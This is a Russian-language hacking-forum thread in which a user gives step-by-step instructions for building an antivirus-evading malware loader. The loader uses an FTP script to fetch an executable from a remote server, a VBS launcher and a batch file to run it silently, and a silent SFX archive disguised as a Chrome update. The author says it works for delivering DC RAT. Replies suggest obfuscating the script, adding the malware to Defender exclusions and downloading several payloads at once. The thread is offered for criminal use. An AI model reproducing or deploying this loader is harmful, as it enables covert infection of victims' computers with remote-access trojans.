Статья Делаем 0/1-26 лоадер за 10 минут

[сатоши]

Показания antiscan.me

AntiScan.Me | Rovilov.exe | 1/26

Scan your file online with multiple different antiviruses without distributing the results of your scan.

antiscan.me

1. Нужен FTP сервер и на него нужно загрузить файл что будет подгружать лоадер.

2. Создаём тхт файл называем "ftp" в него прописываем:

ip сервера/хостинга, или его ссылка. [ Пример: 222.222.2.2 или rovilov.com ]
Логин от FTP. [Пример: vasapro777]
пароль [например: hyipizda]
lcd C:\Program Files [Путь скачивания файла]
binary
get Rovilov.exe [сюда пишем имя файла и расширение]
quit

Пример того что получим:

rovilov.com
777777
hyipizda
lcd C:\Program Files
binary
get rovilov.exe
quit

3. Создаём файл vbs.vbs и прописываем в него:

Set WshShell = CreateObject("WScript.Shell")
WshShell.Run chr(34) & "(fud).cmd" & Chr(34), 0
Set WshShell = Nothing

4. Создаём файл под названием 112.cmd и пишем в него:

Echo OFF

ftp -s:ftp.txt

Start rovilov.exe [тут пишите имя загружаемого файла]

Сделав все выше сказанные шаги получим:

Теперь чтобы это всё работало нужно создать sfx архив с методом сжатия - Максимальный, а так же добавляем комментарий:

ath=C:\Program Files
Setup=vbs.vbs
Silent=1
Overwrite=1
Update=U
Title:-Chrome [Пишем под что маскируем файл]
Text
{
Updating...
}

После создания архива получим лоадер весом 300кб +

Пробовал с DC rat стучит хорошо

 

[DanteXDark]

we can even obfuscate vbs and can run powershell script to add our malware in exclusion folder )))

 

[сатоши]

we can even obfuscate vbs and can run powershell script to add our malware in exclusion folder )))

ай донт нау(

 

[SOLDATKIN]

Напоминает мне loader от DcRAT

 

[сатоши]

Напоминает мне loader от DcRAT

не копался в нём сказать точно не могу

 

[j0mbrade]

можно как то чтоб 2 файла сразу загрузилось?

 

[DanteXDark]

is it possible that 2 files are downloaded at once?

using ftp to download soo i think yes

 

[сатоши]

можно как то чтоб 2 файла сразу загрузилось?

Я не тестил но предпологаю что:
Содержимое ftp.txt

rovilov.com
777777
hyipizda
lcd C:\Program Files
binary
get rovilov.exe
get rovilov2.exe
quit

а содержимое 112.cmd

Echo OFF

ftp -s:ftp.txt

Start rovilov.exe

Start rovilov2.exe

Предполагаю что так ибо мне хватает одного билда

 

[Lowbanger]

Говно и палки

 

[сатоши]

Говно и палки

 

[viktor_H2O]

Говно и палки

эти говнопалки обходят антивирусы, а ты сиди инжекты в експлорер делай, но не пизди потом когда свой говно-паблик-код почистить не сможешь от дефендера дрочно

 

[Lowbanger]

эти говнопалки обходят антивирусы, а ты сиди инжекты в експлорер делай, но не пизди потом когда свой говно-паблик-код почистить не сможешь от дефендера дрочно

Инсталы потекли рекой

 

[viktor_H2O]

Инсталы потекли рекой

вот че выпук делать на ровном месте. предложи что то лучше, без палок и говна.

 

[pablo]

Говно и палки

предложи лучше )

сатоши, облегченный, но интересный подход. неплохо

 

[сатоши]

предложи лучше )

сатоши, облегченный, но интересный подход. неплохо

Благодарю)

 

[crucial]

неплохая идея, но райнтайм все равно говно же получится
и разве безопасно вот так делать "фуд"? там же айпи адрес сервака палится или не?

 

[crucial]

Пробовал с DC rat стучит хорошо

подожди ка, этим криптом дкрат спокойно накрывает? или ты дкрат криптил еще +ом?

 

[Shaurmist25]

неплохая идея, но райнтайм все равно говно же получится
и разве безопасно вот так делать "фуд"? там же айпи адрес сервака палится или не?

а ещё данные от фтп паляться, и кто-то может твою х#йню заменить на свою)))
ну а вобще тут дроп на диск идёт, там детект будет в любом случае..

 

[crucial]

а ещё данные от фтп паляться, и кто-то может твою х#йню заменить на свою)))
ну а вобще тут дроп на диск идёт, там детект будет в любом случае..

ну вот, я о том же

 

[mectury]

very old method sfx ...